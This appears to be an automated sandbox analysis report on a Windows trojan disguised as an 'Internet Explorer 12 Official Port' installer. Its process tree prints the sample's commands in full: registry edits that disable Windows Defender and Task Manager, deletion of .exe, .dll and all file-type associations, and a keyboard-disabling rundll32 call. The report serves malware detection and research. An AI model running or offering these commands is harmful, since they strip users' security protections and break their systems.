Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    24-04-2024 17:08

General

  • Target

    Internet Explorer 12 Official Port.exe

  • Size

    220KB

  • MD5

    575100faacdfe66876bc039999962151

  • SHA1

    8f750c73b95bc39a7d884c9539698d3b61e122bb

  • SHA256

    b9ad9fb27da30bc536f837ed0a5922b8f3bf0eb93a46e42369d13ad62777faab

  • SHA512

    9ca59b4fda92e7a58fa2d92a7c15fbf6ac156c2cdac7c3851d48736ffcdda4f272524b13be54918d33dc72e8db1f05a7cef741822b60ab9b79c68e18d17c5046

  • SSDEEP

    1536:F7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfuwljSZkKvnoHfhT:R7DhdC6kzWypvaQ0FxyNTBfuaj7T

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Disables Task Manager via registry modification
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe
    "C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FAA.tmp\FAB.tmp\FAC.bat "C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\system32\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        3⤵
        PID:2912
      • C:\Windows\system32\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:2340
      • C:\Windows\system32\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
        3⤵
        PID:2776
      • C:\Windows\system32\reg.exe
        reg delete HKCR/.exe
        3⤵
        PID:2736
      • C:\Windows\system32\reg.exe
        reg delete HKCR/.dll
        3⤵
        PID:2084
      • C:\Windows\system32\reg.exe
        reg delete HKCR/*
        3⤵
        PID:2152
      • \??\c:\windows\system32\rundll32.exe
        c:\windows\system32\rundll32.exe keyboard,disable
        3⤵
        PID:3004

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\FAA.tmp\FAB.tmp\FAC.bat

    Filesize

    852B

    MD5

    1a56f95b492e68e5414b74978cb9bf2e

    SHA1

    578fcbb790344df3d0989b0790f3bc1e33855793

    SHA256

    abfc082eb62c3f93029b2cf2134a41fa5e315e821994dee6ab6acfda92b993e8

    SHA512

    acffc8ebba901d2293897a5900d807142df8823b20eb821b0ba188013e038776ab4195b6947d9ba08669c24e26ec5251e9ea56dbe336f349637614aa0b71e9ff

  • memory/2900-12-0x00000000026E0000-0x00000000026E1000-memory.dmp

    Filesize

    4KB